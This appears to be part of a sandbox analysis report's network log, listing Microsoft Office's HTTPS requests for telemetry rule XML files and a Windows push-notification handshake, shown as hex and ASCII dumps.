                      2024-12-03 16:52:03 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                      Session IDSource IPSource PortDestination IPDestination Port
                      88192.168.2.64980613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:03 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:03 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:03 GMT
                      Content-Type: text/xml
                      Content-Length: 472
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                      ETag: "0x8DC582B984BF177"
                      x-ms-request-id: 1cfa5ca7-601e-000d-64b2-422618000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165203Z-174f7845968cdxdrhC1EWRg0en000000165000000000ekve
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:03 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      89192.168.2.64980813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:03 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:04 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:03 GMT
                      Content-Type: text/xml
                      Content-Length: 405
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                      ETag: "0x8DC582B942B6AFF"
                      x-ms-request-id: 9135d871-d01e-00a1-3102-4535b1000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165203Z-174f7845968cs2nkhC1EWR2tq000000001z0000000003tch
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:04 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                      Session IDSource IPSource PortDestination IPDestination Port
                      90192.168.2.64980913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:03 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:04 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:04 GMT
                      Content-Type: text/xml
                      Content-Length: 468
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                      ETag: "0x8DC582BBA642BF4"
                      x-ms-request-id: 4f55dbf3-401e-005b-2250-439c0c000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165204Z-174f7845968xlwnmhC1EWR0sv800000015zg00000000n3r9
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      91192.168.2.64980720.198.119.143443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:04 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 69 50 68 37 51 74 6f 6a 52 30 57 30 30 61 6b 71 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 62 33 38 65 37 35 33 34 37 63 33 62 36 63 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 304MS-CV: iPh7QtojR0W00akq.1Context: cb38e75347c3b6c
                      2024-12-03 16:52:04 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2024-12-03 16:52:04 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 69 50 68 37 51 74 6f 6a 52 30 57 30 30 61 6b 71 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 62 33 38 65 37 35 33 34 37 63 33 62 36 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32 42
                      Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: iPh7QtojR0W00akq.2Context: cb38e75347c3b6c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2B
                      2024-12-03 16:52:04 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 69 50 68 37 51 74 6f 6a 52 30 57 30 30 61 6b 71 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 62 33 38 65 37 35 33 34 37 63 33 62 36 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 196MS-CV: iPh7QtojR0W00akq.3Context: cb38e75347c3b6c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2024-12-03 16:52:04 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:52:04 UTC58INData Raw: 4d 53 2d 43 56 3a 20 43 71 47 6f 49 65 2f 38 33 55 43 75 6d 4b 71 6d 69 42 4a 66 66 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: CqGoIe/83UCumKqmiBJffg.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      92192.168.2.64981013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:04 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:04 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:04 GMT
                      Content-Type: text/xml
                      Content-Length: 174
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                      ETag: "0x8DC582B91D80E15"
                      x-ms-request-id: 357a15c2-f01e-001f-47c7-435dc8000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165204Z-174f7845968nxc96hC1EWRspw800000015ug00000000uqb8
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:04 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                      Session IDSource IPSource PortDestination IPDestination Port
                      93192.168.2.64981213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:05 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:06 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:05 GMT
                      Content-Type: text/xml
                      Content-Length: 958
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                      ETag: "0x8DC582BA0A31B3B"
                      x-ms-request-id: 87286592-701e-0053-7b27-443a0a000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165205Z-174f7845968cpnpfhC1EWR3afc00000015u000000000evfb
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:06 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                      Session IDSource IPSource PortDestination IPDestination Port
                      94192.168.2.64981113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:05 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:06 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:06 GMT
                      Content-Type: text/xml
                      Content-Length: 1952
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                      ETag: "0x8DC582B956B0F3D"
                      x-ms-request-id: b5b05efe-701e-0001-4ea6-43b110000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165206Z-174f7845968xr5c2hC1EWRd0hn0000000qyg00000000smbd
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:06 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                      Session IDSource IPSource PortDestination IPDestination Port
                      95192.168.2.64981313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:06 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:06 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:06 GMT
                      Content-Type: text/xml
                      Content-Length: 501
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                      ETag: "0x8DC582BACFDAACD"
                      x-ms-request-id: f418fe9b-801e-0047-5281-3f7265000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165206Z-174f7845968cpnpfhC1EWR3afc00000015x00000000057k1
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:06 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                      Session IDSource IPSource PortDestination IPDestination Port
                      96192.168.2.64981413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:06 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:06 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:06 GMT
                      Content-Type: text/xml
                      Content-Length: 2592
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                      ETag: "0x8DC582BB5B890DB"
                      x-ms-request-id: db283756-601e-0070-61b4-43a0c9000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165206Z-174f7845968glpgnhC1EWR7uec00000016d0000000008es7
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:06 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                      Session IDSource IPSource PortDestination IPDestination Port
                      97192.168.2.64981513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:06 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:07 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:07 GMT
                      Content-Type: text/xml
                      Content-Length: 3342
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                      ETag: "0x8DC582B927E47E9"
                      x-ms-request-id: b8dd1d48-d01e-005a-01dc-437fd9000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165207Z-174f7845968jrjrxhC1EWRmmrs00000016a000000000gh6h
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:07 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


